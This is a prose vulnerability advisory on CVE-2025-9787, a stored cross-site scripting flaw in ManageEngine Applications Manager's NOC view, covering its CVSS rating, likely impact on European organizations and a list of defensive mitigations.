CVE-2025-9787 is a stored Cross-Site Scripting (XSS) vulnerability classified under CWE-79, found in Zohocorp's ManageEngine Applications Manager versions 177400 and below. The vulnerability exists in the Network Operations Center (NOC) view, where insufficient input neutralization allows an authenticated user with high privileges to inject malicious JavaScript code that is stored on the server and executed in the browsers of other users viewing the affected page. This type of vulnerability can be exploited to hijack user sessions, steal sensitive information, perform unauthorized actions on behalf of users, or propagate malware within the network. The CVSS v3.1 base score is 6.1, indicating a medium severity level. The attack vector is network-based, with low attack complexity, but requires the attacker to have high privileges (PR:H) and user interaction (UI:R). The scope is unchanged (S:U), meaning the vulnerability affects only the vulnerable component. Although no known exploits are reported in the wild, the presence of stored XSS in a critical IT monitoring tool poses a significant risk, especially in environments where multiple administrators access the NOC view. The vulnerability highlights the need for proper input validation and output encoding during web page generation to prevent injection of malicious scripts. As of the published date, no official patches have been linked, so organizations must monitor vendor advisories closely.

For European organizations, this vulnerability could lead to unauthorized disclosure of sensitive monitoring data, session hijacking of privileged users, and potential lateral movement within IT infrastructure. Since ManageEngine Applications Manager is widely used in enterprise IT environments for monitoring applications and network devices, exploitation could disrupt operational visibility and control. Confidentiality and integrity impacts are high because attackers could manipulate monitoring data or gain unauthorized access to administrative functions. Availability impact is low as the vulnerability does not directly cause denial of service. The requirement for high privileges and user interaction limits exploitation but does not eliminate risk, especially in large organizations with multiple administrators. Compromise could also facilitate supply chain attacks or insider threats. The lack of known exploits suggests a window for proactive mitigation before active attacks emerge.

1. Immediately restrict access to the NOC view to only trusted, high-privilege users and enforce strong authentication mechanisms such as multi-factor authentication (MFA). 2. Monitor and audit user activities within the ManageEngine Applications Manager to detect suspicious behavior or injection attempts. 3. Apply vendor patches promptly once released; until then, consider temporary workarounds such as disabling or limiting the vulnerable NOC view features. 4. Implement Web Application Firewall (WAF) rules to detect and block common XSS payloads targeting the application. 5. Enforce Content Security Policy (CSP) headers to restrict execution of unauthorized scripts in browsers accessing the application. 6. Conduct internal code reviews and penetration testing focused on input validation and output encoding in custom configurations or integrations. 7. Educate administrators about the risks of XSS and safe usage practices to avoid inadvertent injection of malicious content. 8. Regularly update and patch all related infrastructure components to reduce the attack surface.